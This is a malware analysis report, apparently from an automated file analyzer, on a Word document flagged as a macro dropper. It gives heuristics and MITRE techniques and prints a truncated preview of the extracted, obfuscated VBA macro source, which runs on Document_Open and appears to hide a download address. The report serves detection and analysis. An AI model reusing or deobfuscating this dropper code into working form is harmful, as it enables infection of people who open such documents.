MALICIOUS
242
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample contains VBA macros, including a Document_Open macro, which is a common technique for executing malicious code upon opening the document. The presence of CreateObject and CallByName calls further indicates the execution of arbitrary code. ClamAV detection as 'Doc.Dropper.Donoff-5743527-0' strongly suggests its malicious nature as a dropper. The VBA script's obfuscated nature prevents a detailed analysis of its specific actions, but the overall pattern points to a downloader or dropper.
Heuristics 7
-
ClamAV: Doc.Dropper.Donoff-5743527-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Donoff-5743527-0
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
CallByName call high OLE_VBA_CALLBYNAMECallByName call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://www.w3.org/1999/02/22-rdf-syntax-ns# In document text (OLE body)
- http://ns.adobe.com/xap/1.0/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 18325 bytes |
SHA-256: 05cdab98632713532dfa634b45cd6641685b795c473a1e35b820d747a1259de7 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Function LZayEVmQXU(ByVal UjmujbLzTa As Integer) As String
ecsXaTapYAWYQn
yuMNnluqr 8198
If uIAdT(8828, "Lrn9OzDaOKlgH2X09idQJj") Then
ubAHIwPRpnz
YnaEsDid = 7276
yotigvDhCKLA 4905, "veKhnvQ9N39JvLBMzFtERiNhuRZx"
NnDEk
End If
apYEF = "nURbmD7jY52UHjfB2ADrHiqEaXkH"
LZayEVmQXU = "nv3uAsJsXHXPVNj5UK67EPZ9"
End Function
Private Function nbLOTVKBuE() As Integer
RNLoUPaYOauCGu False
KPUqSBxlBqkzdI 2233, "W6HHXEQmlz0q0iAR3e1skqiybsdl0MM"
zfkhQwYfYd
nbLOTVKBuE = 5204
End Function
Private Function VeYCADk() As String
If WUdYajPldqBOdQ(9126) Then
QaHNQqgnxsfh = 8634
ybxoN
Else
lVQnfJqn True
vnmTiCl
LTKJkaHGFhQQvU
End If
exjIUwNxqc = True
VeYCADk = "GqxQFafvjJMaUfEYDf8VAq"
End Function
Private Sub Document_Open()
Cmfcqz.fAIyvwMoDWdAqG
End Sub
Private Function rXFyQZX(ByVal ochvEnvi As String, ByVal UGadh As Integer) As Integer
IofAoHKGg 4374
LooIFSQKgYpVEo
eMXMZEBzbLy
If DQrIrky Then
TiZBEVQEh
Else
sriZx = "FqDt7nx9NFkqjrjzDx2Ccq95koGvses2"
EmiHz
jYnJlKMrtPXzod
End If
rXFyQZX = 1337
End Function
Attribute VB_Name = "Cmfcqz"
Private Function tdwyv(ByVal apJLmgqOsy As Object, ByVal ztfyWpNHoNOqaM As Boolean) As Object
Dim jqkqIVPItFY As Integer
kaMztvU = False
Set tdwyv = apJLmgqOsy
End Function
Public Sub fAIyvwMoDWdAqG()
On Error GoTo DUqjBthJpZ
Nommqduu.wwmWgw
PhjzJKSXx = True
Nommqduu.KqYLMgET
EZtinYqYyuN
Exit Sub
ySxtZhW = 5724
DUqjBthJpZ:
End Sub
Private Sub EZtinYqYyuN()
Dim PcuSqW As String
Dim JTmvFoO As Integer
fToqHzgn = "wVtLUQy20i7knCcsWT97RDHEKcchS"
kzUErzyCQkAv 5737, ypaXdGjFRYNaMZ.sRntTAN, JoQQnFUulX.TOdjaw("hBXtBtpF:L/GB/XboTTlLhaOLpHiaXcT.TGeLuv/cXaGtvaFlvTovg/BoFOffOiLcveOG12v.XdXFatG", "LHTOvAFBXGJ")
lgoKJhYxMBeU = 6867
ypaXdGjFRYNaMZ.PNtsi 6258, ypaXdGjFRYNaMZ.sRntTAN
End Sub
Public Function QpmWeMJhvzGr(ByVal OWZwOtpe As String) As Object
Dim PyFUsF As String
Dim MmXNUBPKnRtC As Boolean
GDBIWT = "87uJWCqBd5Sn0HSjXZqHGdRNgLAUHE"
Set QpmWeMJhvzGr = tdwyv(CreateObject(OWZwOtpe), True)
End Function
Private Function hQhtOTpFMOjTzc(ByVal NbBDjPEzkuYvQH As String) As Integer
If CPhAR(8404, "2JBbfasTPxm0bZnkiyInL") Then
TUmMp = 7354
lmfFPiGbljYQvD
LCiFGnfso
IRkHq
kuYCu = "83m2W7L5pXkBcM9154W6sVi"
Else
qlCOyfXDlZPf
NXOjIDYsWUy "KC5c4kntPTmkXhqPRu4FLxDH2NE", 4897
HRgIXaDncrykfu
End If
ImQkyteSYNhfQB 4147, 3708, 9625
hQhtOTpFMOjTzc = 2465
End Function
Private Sub kzUErzyCQkAv(ByVal BvvfIvT As Integer, ByVal xbaJGpWLLLcle As String, ByVal CVlDhVvzJUjZ As String)
Dim SgkhPNfBT As Integer
Set oKbaR = XbxhiYrWJjE.QBWzcMnRCgzT(CVlDhVvzJUjZ, 7913, True)
XbxhiYrWJjE.Pfhdyj "rBuapSHZMLfE0rofcGKN0fd7v0vR", iDnNZI, 3895, oKbaR
vGDgvv = True
ypaXdGjFRYNaMZ.mhROn 6655, nbOZRXxObH.LEpyMKZDGWp(2621, oKbaR, "JEBcVnOHpAs8QMY8TQtPnx7aWIepKtQ9", JoQQnFUulX.TOdjaw("RFiesZNpToZnsOOeBDoFdZyq", "FYODTNiZq")), "opWXvE9AvizFoRN2GKvDBXGnfSWU0", xbaJGpWLLLcle
End Sub
Private Function iDnNZI() As String
iDnNZI = JoQQnFUulX.TOdjaw("CLa4nKL'tK L/doKw/nLl.oLa.dKK bKiKLnqaYry4 /RfiL/leq", "RKL4q./Y")
End Function
Attribute VB_Name = "JoQQnFUulX"
Private Sub FSnQpGAFsc()
WqmJNfv False, 4187, False
VfkslYky 3928, True, 3091
End Sub
Public Function rcysmwsoXa(ByVal bWGpJFFP As String, ByVal jcZSJhUcjfKDJ As Boolean, ByVal aCfTTaaPSDZGh As String) As String
Dim ikSaFKpAYYPM As Boolean
Dim mVTCzpcvmQ As Integer
GcUipgETJKI = "fborvQ5kEa8ffE54uUthbOUMGLHMP"
rcysmwsoXa = bWGpJFFP & aCfTTaaPSDZGh
End Function
Private Sub VoxxXDnocWBuze()
GpjFeBCPbB 3835, "bUiIsp9t2XfkOpmiIAJpkLptMV", 8764
cvGoxUKqh 5484, 760, 7177
tXENUnWwYO = 3182
laGSuSPAztV
End Sub
Private Function XkJNx(ByVal iLmyvAjZgRZA As String, ByVal OXCkSR As String) As String
If Not aZgRzQ.eMPnjaWlHoqH("zZi2rXi9ytx6Cj4vpaWSWswF", OXCkSR, iLmyvAjZgRZA, "EqNu46bxXQdX68yPu3Fy") Then
XkJNx = OXCkS
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.